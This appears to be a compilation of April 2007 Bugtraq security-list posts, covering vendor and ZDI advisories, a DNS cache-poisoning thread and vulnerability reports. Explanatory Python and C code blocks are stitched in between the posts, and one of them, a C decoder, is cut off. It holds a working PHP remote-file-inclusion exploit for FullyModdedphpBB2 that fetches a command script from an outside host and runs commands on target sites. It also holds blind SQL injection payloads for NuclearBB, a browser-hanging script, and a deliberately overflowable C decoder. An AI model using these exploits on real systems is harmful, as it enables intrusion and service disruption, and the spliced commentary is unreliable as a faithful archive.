Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website:
http://h2.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManuallang=encc=usdocIndexId=179111taskId=101prodTypeId=12169prodSeriesId=315667

Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005, starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already.

RESOLUTION
HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy.

NOTE: Patch installation instructions are shown at the end of this table.

MS Patch: MS07-017 Vulnerabilities in GDI Could Allow Remote Code Execution (925902)
Analysis: Possible security issue exists. Patch will run successfully.
Action: For SMA v2.1, customers should download patch from Microsoft and install.

Installation Instructions: (if applicable)
Download patches to a system other than the SMA
Copy the patch to a floppy diskette or to a CD
Execute the patch by using Terminal Services to the SMA or by attaching a keyboard, monitor and mouse to the SMA.

The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more information please refer to the following website:
http://www.microsoft.com/downloads/details.aspx?FamilyID=889482fc-5f56-4a38-b838-de776fd4138chash=SYSSXDFdisplaylang=en

PRODUCT SPECIFIC INFORMATION

HISTORY
Version: 1 (rev.1) - 10 April 2007 Initial release
Version: 2 (rev.2) - 17 April 2007 Corrected MS patch # MS07-014 to MS07-017

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as
Re: Internet Explorer Crash
Tested on several machines - max CPU went to 25, and IE came up asking if I wanted to stop the script in all cases. This is true of a default Vista install of IE 7 and XP Pro installs upgraded to IE 7. Scripting has to be on as well... Even on a dog computer, the prompt will come up (eventually). Non-issue here.

t

- Original Message -
From: Tom Gregory [EMAIL PROTECTED]
To: Thor (Hammer of God) [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com
Sent: Wednesday, April 18, 2007 9:12 AM
Subject: Re: Internet Explorer Crash

> Actually yes, the PoC crashed my IE, made it hang, and my CPU usage went to 100%, and I'm using Internet Explorer 7.0.5730.11 like he said.
>
> Tom
>
> Thor (Hammer of God) wrote:
>> Actually, I just get a message that says "A script on this page is causing Internet Explorer to run slowly." But my CPU usage for iexplore.exe is only at 20, and my system didn't slow down in the least. I went ahead and told IE to continue to run the script, and it pops up again in a bit asking me the same thing. Finally bored, I say no and it immediately came up with "Goodbye" on the page. If this actually makes Safari and Konqueror crash, why the "stop using Microsoft products" recommendation? At least IE is smart enough to tell me that your little stupidInternetExploder script is being pesky.
>>
>> t
>>
>> - Original Message -
>> From: J. Oquendo [EMAIL PROTECTED]
>> To: bugtraq@securityfocus.com
>> Sent: Tuesday, April 17, 2007 10:09 AM
>> Subject: Internet Explorer Crash
>>
>>> Product: Internet Explorer Version 7.0.5730.11
>>> Impact: Browser crash possibly more
>>> Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>>>
>>> I. BACKGROUND
>>> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
>>>
>>> II. DESCRIPTION
>>> IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash.
>>>
>>> III SOLUTION
>>> Stop using Microsoft products or deal with a new advisory every other day.
>>>
>>> IV. Proof
>>> http://www.infiltrated.net/stupidInternetExploder.html
>>>
>>> V. Code
>>> $ more /stupidInternetExploder.html
>>> <script>
>>> var reg = /(.)*/;
>>> var z = 'Z';
>>> while (z.length <= 99999999999) z+=z;
>>> var boum = reg.exec(z);
>>> </script>
>>> Goodbye
>>>
>>> J. Oquendo
>>> http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
>>> sil . infiltrated @ net http://www.infiltrated.net
>>> "The happiness of society is the end of government." - John Adams
RE: Re[2]: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
Thanks for responding. If this is the case, why is this report a report of a Windows DNS vulnerability, since it appears to be a DNS (or at least BIND and Windows) vulnerability? My guess is the original poster didn't include BIND in his test scope or something like that.

Roger

*
*Roger A. Grimes, InfoWorld, Security Columnist
*CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...
*email: [EMAIL PROTECTED] or [EMAIL PROTECTED]
*Author of Professional Windows Desktop and Server Hardening (Wrox)
*http://www.amazon.com/gp/product/0764599909
*

-----Original Message-----
From: 3APA3A [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, April 17, 2007 4:50 PM
To: Roger A. Grimes
Cc: Makoto Shiotsuki; bugtraq@securityfocus.com
Subject: Re[2]: Windows DNS Cache Poisoning by Forwarder DNS Spoofing

Dear Roger A. Grimes,

A DNS spoofing attack in general can not be 'patched', because this is a weakness of the DNS protocol itself. As for birthday attack applicability, this problem was discussed in 2002. In 2003 the problem still existed in both bind 8 and 9. According to CERT (US-CERT), as of 10/18/2004 bind was still vulnerable. As far as I remember, there never was a patch for bind to prevent this specific attack, yet it can be a part of some later bind release.

A possible mitigation against birthday attacks (not against spoofing in general) on the server software level is any of:

1. Do not reuse the source port for DNS requests. Have every request issued from a different source port (a resource consumption attack is possible).
2. Keep a table of issued requests and do not issue a request for the same name before the response to the previous one is received (can not be implemented in a scalable 'multiple processes' DNS server architecture).
3. Monitor if multiple replies are received for a single request.

I don't know if bind actually uses any.

Hope this helps.

--Tuesday, April 17, 2007, 8:48:04 PM, you wrote to [EMAIL PROTECTED]:

RAG> How does BIND stop this sort of attack?
RAG> Can a BIND expert respond?
RAG> Roger
RAG> *
RAG> *Roger A. Grimes, InfoWorld, Security Columnist *CPA, CISSP, MCSE:
RAG> Security (2000/2003/MVP), CEH, yada...yada...
RAG> *email: [EMAIL PROTECTED] or [EMAIL PROTECTED] *Author
RAG> of Professional Windows Desktop and Server Hardening (Wrox)
RAG> *http://www.amazon.com/gp/product/0764599909
RAG> *
RAG> -----Original Message-----
RAG> From: Makoto Shiotsuki [mailto:[EMAIL PROTECTED]]
RAG> Sent: Tuesday, April 17, 2007 12:31 PM
RAG> To: Roger A. Grimes
RAG> Cc: bugtraq@securityfocus.com
RAG> Subject: Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
RAG>> One question. Is BIND any better at preventing this type of attack?
RAG> As far as I know, this vulnerability is specific to the Windows DNS.
RAG> Makoto Shiotsuki

--
~/ZARAZA
http://securityvulns.com/
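The three mitigations 3APA3A lists, together with the query aggregation Makoto Shiotsuki describes for BIND 9, as an added model that is not BIND or Windows DNS code: an outstanding-query table that sends one upstream query per name at a time, draws a fresh random source port for each, and flags a second reply for a request that was already answered, plus the usual birthday estimate showing why aggregation and port randomisation shrink an attacker's odds. The names, counts and the simplified probability formula are assumptions of this example.

```python
"""Outstanding-query table modelling the birthday-attack mitigations from the
thread. Added illustration, not resolver code; the probability estimate is the
usual approximation (independent uniform IDs) and the table keeps no timers.
Names and figures below are constructed.
"""
import secrets

ID_SPACE = 1 << 16           # 16-bit DNS transaction ID
PORT_SPACE = 65536 - 1024    # ephemeral ports 1024..65535 when randomising


def spoof_success_probability(outstanding: int, spoofed: int,
                              id_space: int = ID_SPACE) -> float:
    """Chance that at least one of `spoofed` forged replies matches one of
    `outstanding` in-flight queries for the same name, each ID uniform over
    `id_space`. With n outstanding and n forged packets this is roughly
    1 - exp(-n^2 / id_space) (the birthday effect); with a single outstanding
    query it collapses to about n / id_space."""
    if outstanding <= 0 or spoofed <= 0:
        return 0.0
    p_miss = 1.0 - min(outstanding, id_space) / id_space
    return 1.0 - p_miss ** spoofed


class PendingQueries:
    """Mitigation 2: one upstream query per name at a time (aggregation).
    Mitigation 1: a fresh random source port per query when randomize_ports.
    Mitigation 3: a reply for a request that was already answered is logged."""

    def __init__(self, randomize_ports: bool = True):
        self.randomize_ports = randomize_ports
        self.in_flight = {}   # qname -> (txid, port)
        self.entries = {}     # (txid, port) -> {"name": qname, "replies": n}
        self.alerts = []

    def issue(self, qname: str):
        """Return the (txid, port) to send upstream, or None if a query for
        qname is already outstanding and this client must wait for it."""
        qname = qname.lower()
        if qname in self.in_flight:
            return None
        while True:
            txid = secrets.randbelow(ID_SPACE)
            port = 1024 + secrets.randbelow(PORT_SPACE) if self.randomize_ports else 53
            key = (txid, port)
            if key not in self.entries:
                break
        self.in_flight[qname] = key
        self.entries[key] = {"name": qname, "replies": 0}
        return key

    def accept_reply(self, qname: str, txid: int, port: int) -> bool:
        """True only for the first reply that matches an outstanding query by
        ID, destination port and name. Later matching replies are suspicious
        (a spoofing attempt or a duplicate) and are recorded in self.alerts."""
        entry = self.entries.get((txid, port))
        if entry is None or entry["name"] != qname.lower():
            return False
        entry["replies"] += 1
        if entry["replies"] == 1:
            self.in_flight.pop(entry["name"], None)   # answered; a new query may go out
            return True
        self.alerts.append(f"extra reply #{entry['replies']} for {qname} id={txid} port={port}")
        return False

    def outstanding(self) -> int:
        return len(self.in_flight)


def simulate_burst(clients: int = 300) -> tuple:
    """Push `clients` simultaneous recursive queries for one name through the
    table and return (upstream queries actually sent, spoof success estimate
    with aggregation, estimate without it) for `clients` forged replies."""
    table = PendingQueries()
    issued = [table.issue("www.example.test") for _ in range(clients)]
    sent = sum(k is not None for k in issued)
    with_agg = spoof_success_probability(sent, clients)
    without_agg = spoof_success_probability(clients, clients)
    return sent, with_agg, without_agg


if __name__ == "__main__":
    sent, with_agg, without_agg = simulate_burst()
    print(f"upstream queries sent: {sent}")
    print(f"spoof success, aggregated: {with_agg:.4f}; unaggregated: {without_agg:.4f}")
    print(f"with random ports too: {spoof_success_probability(300, 300, ID_SPACE * PORT_SPACE):.2e}")
```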
FullyModdedphpBB2 Remote File Inclusion
Hello,,

FullyModdedphpBB2 Remote File Inclusion .. With exploit :)

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]

/* Script info
## Mod Title: FullyModdedphpBB2
## Description: A fully modded phpBB
*/

Remote File Include:
subscp.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?

Exploit:

<?php
//
/* Fully Moded PHPBB2 Command Execution Exploit */
/* By : HACKERS PAL [EMAIL PROTECTED] */
/* Website : WwW.SoQoR.NeT */
//
error_reporting(0);
ini_set("max_execution_time", 0);
function get_page($url) {
    if (function_exists("file_get_contents")) {
        $contents = file_get_contents($url);
    } else {
        $fp = fopen($url, "r");
        while ($line = fread($fp, 1024)) {
            $contents = $contents . $line;
        }
    }
    return $contents;
}
echo "<body bgcolor=\"#00\" text=\"#00FF00\">\n<title>Fully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::</title>\n\r"
   . "<h2>Fully Moded PHPBB2 Command Execution</h2>\n\r"
   . "<h3>By : HACKERS PAL [EMAIL PROTECTED]</h3>"
   . "<h3>VisiT My Website [<a href=\"http://WwW.SoQoR.NeT\">WwW.SoQoR.NeT</a>]</h3>\n\r";
$expl = base64_decode("c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=");
$action = $_GET['action'];
if ($action == "") {
    echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n"
       . "Web URL -- Example : http://localhost/FullyModed\n<br>"
       . "<input type=\"text\" name=\"url\" style=\"width:250\">\n<br><br>\n"
       . "Command : <br><textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n<br>\n<br>"
       . "<div align=\"center\">\n<input type=\"submit\"></div>\n</form>\n";
} else {
    $exploit = $_POST['url'] . "/" . $expl . "cmd=" . $_POST['query'];
    $page = get_page($exploit);
    if (!eregi("hacking attempt", $page)) {
        echo "<h1>Command Successfully executed .. Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>";
    }
}
die(base64_decode("..."));  // base64-encoded HTML footer omitted (not reproduced here)
Re: [funsec] Re: [Full-disclosure] A Botted Fortune 500 a Day
- -- Nick FitzGerald [EMAIL PROTECTED] wrote:

> Steven Adair wrote:
>> Also, as a side note, I would like to add that just because SPAM is coming from a certain gateway does not necessarily mean that the machines on their network are infected.
> ...
> Did you read any of their reports fully? They don't assume that. They track the mail back behind the gateways and they know what forms of what spam are being sent through bot-nets because of other systems they run (honeypots, etc) and analysis they perform.

Indeed.

Also, our (Trend Micro) analysis shows that virtually all spam these days is being sent by spambots. The guys at Support Intelligence (Rick and Adam) have done their homework.

- ferg

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawg(at)netzero.net
ferg's tech blog: http://fergdawg.blogspot.com/
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
[Bojan Zdrnja]
> I'm not sure what's the story with other DNS servers (djbdns, for example).

In regard to djbdns, I believe that that's answered at:

http://cr.yp.to/djbdns/dnscache.html

where it says:

  dnscache does not cache (or pass along) records outside the server's bailiwick; those records could be poisoned. Records for foo.dom, for example, are accepted only from the root servers, the dom servers, and the foo.dom servers.

Regards,
Matt
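The bailiwick rule Matt quotes, applied to the kind of reply Bojan describes, as an added example that is not dnscache, BIND or Windows DNS code: the resolver reached the answering server through the delegation for an attacker-controlled zone, so any authority or additional record whose owner name lies outside that zone (NS records for .com or .net, glue for a TLD server) is ignored before anything is cached. The zone, names and addresses are constructed for the example.

```python
"""Bailiwick filter for DNS reply records.

Added illustration, not dnscache or BIND code. Records are modelled as
(owner name, type, rdata, section); the zone the answering server was
delegated for is the bailiwick. All names and addresses are made up.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    name: str      # owner name, e.g. "ns1.attacker.example."
    rtype: str     # "A", "NS", ...
    rdata: str
    section: str   # "answer", "authority" or "additional"


def _labels(name: str) -> list:
    """Split a DNS name into lower-cased labels; the root '.' yields []."""
    return [lab for lab in name.lower().rstrip(".").split(".") if lab]


def in_bailiwick(name: str, zone: str) -> bool:
    """True if `name` equals `zone` or lies below it, compared label by label
    (so 'evildom.' is not under 'dom.'). The root covers every name."""
    n, z = _labels(name), _labels(zone)
    if not z:
        return True
    return len(n) >= len(z) and n[-len(z):] == z


def filter_reply(bailiwick: str, records: list) -> tuple:
    """Split reply records into those a sane cache may keep and those it must
    ignore because their owner name is outside the answering server's
    bailiwick (the records Windows 2000 SP3 accepted and BIND 9 strips)."""
    kept, dropped = [], []
    for rr in records:
        (kept if in_bailiwick(rr.name, bailiwick) else dropped).append(rr)
    return kept, dropped


def cache_reply(cache: dict, bailiwick: str, records: list,
                enforce: bool = True) -> list:
    """Store reply records in `cache` keyed by (name, type) and return the
    records that were ignored. With enforce=False the cache behaves like the
    vulnerable forwarder: every RR in the reply is trusted."""
    kept, dropped = filter_reply(bailiwick, records) if enforce else (list(records), [])
    for rr in kept:
        cache.setdefault((rr.name.lower(), rr.rtype), set()).add(rr.rdata)
    return dropped


# Constructed reply to "www.attacker.example. A", answered by the server the
# resolver reached via the delegation for attacker.example.
POISONED_REPLY = [
    RR("www.attacker.example.", "A", "192.0.2.10", "answer"),
    RR("attacker.example.", "NS", "ns1.attacker.example.", "authority"),
    RR("ns1.attacker.example.", "A", "192.0.2.53", "additional"),
    # out-of-bailiwick authority RRs that try to redirect whole TLDs
    RR("com.", "NS", "ns1.attacker.example.", "authority"),
    RR("net.", "NS", "ns1.attacker.example.", "authority"),
    # out-of-bailiwick glue for a made-up TLD server name
    RR("a.gtld-servers.test.", "A", "192.0.2.66", "additional"),
]


def demo() -> dict:
    """Return what a bailiwick-checking cache holds after POISONED_REPLY."""
    cache = {}
    cache_reply(cache, "attacker.example.", POISONED_REPLY)
    return cache


if __name__ == "__main__":
    for rr in cache_reply({}, "attacker.example.", POISONED_REPLY):
        print("ignored out-of-bailiwick", rr.section, rr.rtype, rr.name)
    trusting = {}
    cache_reply(trusting, "attacker.example.", POISONED_REPLY, enforce=False)
    print("a trusting cache would now hold NS for:",
          sorted(k[0] for k in trusting if k[1] == "NS"))
```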
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"

= String Inputs =

-- login.php - $_POST['submit'] --
username=xyz password=passxyz submit=Login+and+1=0

-- register.php - $_POST['website'] --
[EMAIL PROTECTED] [EMAIL PROTECTED] pass1=passwordxyz pass2=passwordxyz [EMAIL PROTECTED]+and+1=0 [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register

-- register.php - $_POST['aol'] --
[EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]+and+1=0 [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register

-- register.php - $_POST['signature'] --
[EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]+and+1=0 coppa_state=over register_submit=Register

== Numeric Inputs ==

--- groups.php - $_GET['g'] ---
http://www.example.com/groups.php?g=1+and+1=0

-- register.php - $_POST['email'] --
[EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] coppa_state=over register_submit=Register

John Martinelli
[EMAIL PROTECTED]
http://john-martinelli.com
April 18th, 2007
ZDI-07-015: Novell Groupwise WebAccess Base64 Decoding Stack Overflow Vulnerability
ZDI-07-015: Novell Groupwise WebAccess Base64 Decoding Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-015.html
April 18, 2007

-- CVE ID:
CVE-2007-2171

-- Affected Vendor:
Novell

-- Affected Products:
Groupwise WebAccess

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since April 19, 2007 by Digital Vaccine protection filter ID 5295. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise WebAccess. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the GWINTER.exe process bound by default on TCP ports 7205 and 7211. During the handling of an HTTP Basic authentication request, the process copies user-supplied base64 data into a fixed length stack buffer. Sending at least 336 bytes will trigger a stack based buffer overflow due to a vulnerable base64_decode() call. Exploitation of this issue can result in arbitrary code execution.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at:
http://download.novell.com/Download?buildid=8RF83go0nZg~
http://download.novell.com/Download?buildid=O9ucpbS1bK0~

-- Disclosure Timeline:
2007.03.19 - Vulnerability reported to vendor
2007.04.18 - Coordinated public release of advisory
2007.04.19 - Digital Vaccine released to TippingPoint customers

-- Credit:
This vulnerability was discovered by Tenable Network Security.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-07-016: Oracle E-Business Suite Arbitrary Node Deletion Vulnerability
ZDI-07-016: Oracle E-Business Suite Arbitrary Node Deletion Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-016.html
April 18, 2007

-- CVE ID:
CVE-2007-2170

-- Affected Vendor:
Oracle

-- Affected Products:
Oracle E-Business Suite

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since December 14, 2006 by Digital Vaccine protection filter ID 4919. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to delete any existing Document Management node on vulnerable installations of Oracle E-Business Suite. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the APPLSYS.FND_DM_NODES package. The procedure to delete nodes does not check for a valid session, thereby allowing an attacker to arbitrarily delete any node registered, including the root node.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More details can be found at:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html

-- Disclosure Timeline:
2007.01.29 - Vulnerability reported to vendor
2006.12.14 - Digital Vaccine released to TippingPoint customers
2007.04.18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Joxean Koret.
ZDI-07-017: Oracle E-Business Suite Arbitrary Document Download Vulnerability
ZDI-07-017: Oracle E-Business Suite Arbitrary Document Download Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-017.html
April 18, 2007

-- CVE ID:
CVE-2007-2135

-- Affected Vendor:
Oracle

-- Affected Products:
Oracle E-Business Suite

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since December 14, 2006 by Digital Vaccine protection filter ID 4924. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to download any existing document in the APPS.FND_DOCUMENTS table on vulnerable installations of Oracle E-Business Suite. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the ADI_BINARY component of the E-Business Suite. The component exposes a parameter that can also be passed to ADI_DISPLAY_REPORT to allow an attacker to view any document in the APPS.FND_DOCUMENTS table. An attacker can cycle through all document IDs to display each document that exists.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More details can be found at:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html

-- Disclosure Timeline:
2007.01.29 - Vulnerability reported to vendor
2006.12.14 - Digital Vaccine released to TippingPoint customers
2007.04.18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Joxean Koret.
ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vulnerability
ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-018.html
April 18, 2007

-- CVE ID:
CVE-2007-2137

-- Affected Vendor:
IBM

-- Affected Products:
IBM Tivoli Monitoring Express 6.1

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Monitoring Express. Authentication is not required to exploit this vulnerability.

The specific flaws exist in the Tivoli Universal Agent Primary Service (TCP 10110), Monitoring Agent for Windows OS - Primary (TCP 6014) and Tivoli Enterprise Portal Server (TCP 14206) services. When a long string is sent to these services, it will result in a heap overflow during a call to a vulnerable function in kde.dll, resulting in the ability to execute arbitrary code.

-- Vendor Response:
IBM has issued an update to correct this vulnerability. More details can be found at:
http://www-1.ibm.com/support/docview.wss?uid=swg24012341

-- Disclosure Timeline:
2006.09.14 - Vulnerability reported to vendor
2007.04.18 - Public release of advisory

-- Credit:
This vulnerability was discovered by CIRT.DK.
Re: PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities
[EMAIL PROTECTED] wrote:

> PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities
>
> PROGRAM: PHP-Nuke
> HOMEPAGE: http://phpnuke.org/
> VERSION: All version
> BUG: PHP Nuke <= 8.0.0.3.3b Bypass SQL Injection Protection and SQL Injections vulnerabilities
> AUTHOR: Aleksandar
>
> Let's look at source code from mainfile.php line 435
> __
> //Union Tap
> //Copyright Zhen-Xjell 2004 http://nukecops.com
> //Beta 3 Code to prevent UNION SQL Injections

No offense, but newer versions were released. You're quoting old UT code.
Re: Internet Explorer Crash
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html

For what it's worth this killed my Toshiba Satellite A100-49 (1.66GHz Intel Core Duo) running Solaris Developer Express (b55) with Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3 stone dead. Even the clock stopped ticking!

Regards,
Rob

--
Sun Microsystems                  Weave a circle round him thrice,
mailto: [EMAIL PROTECTED]         And close your eyes with holy dread,
Tel: +44 1252-426-299             For he on honey-dew hath fed,
Mobile: +44 7710-901-702          And drunk the milk of Paradise.
ZDI-07-019: BMC Patrol PerformAgent bgs_sdservice Memory Corruption Vulnerability
ZDI-07-019: BMC Patrol PerformAgent bgs_sdservice Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-019.html
April 18, 2007

-- CVE ID:
CVE-2007-2136

-- Affected Vendor:
BMC

-- Affected Products:
Patrol

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since April 13, 2007 by Digital Vaccine protection filter ID 5287. For further product information on the TippingPoint IPS: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of BMC Patrol. User interaction is not required to exploit this vulnerability.

The specific flaw exists due to improper parsing of XDR data sent to the bgs_sdservice.exe process, which listens by default on TCP port 10128. An attacker can influence a parameter to a memory copy operation and cause corruption of the stack, including the SEH pointers stored there. This can be leveraged to execute arbitrary code.

-- Vendor Response:
BMC has provided the following statement:

[This issue] has been addressed, and a patch has been made available to our customers. A flash bulletin has been created describing the patch and will be sent to all affected customers in the next few days.

BMC has a formal customer support mechanism in place to provide solutions to security issues brought to us by those who have legally licensed our software. In cases where security issues are brought to my attention by individuals/vendors who do not have legal access to our products, we will investigate their merit; however, the issues will be addressed at our own discretion and according to our understanding of their severity. Finally, please note that in the future, I will only communicate resolutions and workarounds to licensed customers who are using our software legally.

For a more meaningful dialogue around these issues and to be notified of any available patches, I urge all licensed customers to use BMC's support mechanism.

-- Disclosure Timeline:
2007.03.05 - Vulnerability reported to vendor
2007.04.13 - Digital Vaccine released to TippingPoint customers
2007.04.18 - Public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
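The advisory only says that an attacker-influenced length reaches a memory copy during XDR parsing and corrupts the stack up to the SEH records. The block below is an added example written for this page, not BMC's code and not the bgs_sdservice parser: it shows that bug class in a minimal XDR "opaque" decoder that trusts the length word from the wire, next to a decoder that checks the length against both the destination buffer and the bytes actually received. The 64-byte buffer, the packet layout and the three sample packets are assumptions for illustration.

```c
/*
 * Added example, not BMC's code. It shows the bug class the advisory
 * describes, an attacker-supplied XDR length driving a memcpy into a fixed
 * stack buffer, beside a bounds-checked decoder. The 64-byte buffer, the
 * packet layout and the sample packets are assumptions for illustration.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OPAQUE_MAX 64   /* assumed size of the decoder's local buffer */

/* XDR encodes an unsigned int as four big-endian bytes. */
static uint32_t xdr_get_u32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/*
 * Vulnerable shape: the length read from the packet is passed straight to
 * memcpy. A value above OPAQUE_MAX overruns buf and the rest of the stack
 * frame; on Windows the exception-registration (SEH) records live there,
 * which is the corruption the advisory says can be turned into code
 * execution. Returns the byte count copied, or -1 on a short header.
 */
int decode_opaque_unchecked(const uint8_t *pkt, size_t pktlen, char *out)
{
    char buf[OPAQUE_MAX];
    if (pktlen < 4)
        return -1;
    uint32_t len = xdr_get_u32(pkt);
    memcpy(buf, pkt + 4, len);          /* len is never validated */
    memcpy(out, buf, len);
    return (int)len;
}

/*
 * Hardened: reject a length that would not fit the destination, and a
 * length (rounded up to XDR's 4-byte padding) that exceeds the bytes that
 * actually arrived, before touching memory.
 */
int decode_opaque_checked(const uint8_t *pkt, size_t pktlen, char *out)
{
    char buf[OPAQUE_MAX];
    if (pktlen < 4)
        return -1;
    uint32_t len = xdr_get_u32(pkt);
    if (len > OPAQUE_MAX)               /* would overrun buf */
        return -1;
    size_t padded = ((size_t)len + 3u) & ~(size_t)3u;
    if (padded > pktlen - 4)            /* claims more data than is present */
        return -1;
    memcpy(buf, pkt + 4, len);
    memcpy(out, buf, len);
    return (int)len;
}

/* Constructed sample messages, not captured traffic. */
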